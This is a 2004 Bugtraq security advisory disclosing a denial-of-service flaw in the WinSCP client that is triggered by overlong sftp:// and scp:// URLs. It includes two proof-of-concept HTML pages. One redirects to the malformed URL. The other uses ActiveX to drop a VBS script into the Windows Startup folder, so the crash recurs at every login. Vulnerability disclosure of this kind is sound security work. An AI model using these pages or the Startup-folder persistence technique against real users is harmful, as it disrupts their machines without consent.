[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
WinSCP Denial of Service
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: WinSCP Denial of Service
- From: Luca Ercoli <luca.e@xxxxxxxxxx>
- Date: 15 Apr 2004 06:17:04 -0000
Package: WinSCP
Auth: http://winscp.sourceforge.net
Version(s): 3.5.6 (maybe also prior versions are vulnerable)
Vulnerability: Denial of Service
What?s WinSCP:
?WinSCP is an open source SFTP (SSH File Transfer Protocol) and
SCP (Secure CoPy) client for Windows using SSH (Secure SHell).
Its main function is safe copying of files between a local and
a remote computer.?
Vulnerability Description:
A default installation of WinSCP provide the user with
functionality to handle sftp:// and scp:// addresses.
The vulnerability exists due to the way the application
handles long URL?s. A malformed scp:// or sftp:// address
embedded in a HTML tag cause the WinSCP application to
exhaust CPU and Memory resources.
The attacker would need the ability to convince the user
to visiting a web site he controlled or opening an HTML
e-mail he had prepared. During the denial of service,
WinSCP will not display any GUI.
Goal:
An attacker may use this flaw to prevent the users of attacked
host from working properly.
Pratical Examples:
------ WinSCP_DoS1.html --------
<HTML>
<HEAD>
<TITLE>WinSCP DoS</TITLE>
<meta http-equiv="Refresh" content="0; URL=sftp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
</HEAD>
<BODY>
</BODY>
</HTML>
----------------------------------
-------- WinSCP_DoS2.html -------
<html>
<head>
<title>WinSCP DoS</title>
<script language="JScript">
var WshShell = new ActiveXObject("WScript.Shell");
strSU = WshShell.SpecialFolders("StartUp");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);
vibas.WriteLine("Dim shell");
vibas.WriteLine("Dim quote");
vibas.WriteLine("Dim DoS");
vibas.WriteLine("Dim param");
vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");
vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");
vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")");
vibas.WriteLine("quote = Chr(34)");
vibas.WriteLine("pgm = \"explorer\"");
vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");
vibas.Close();
</script>
</head>
</html>
----------------------------------
Credits:
--
Luca Ercoli <luca.e [at] seeweb.com>
Seeweb http://www.seeweb.com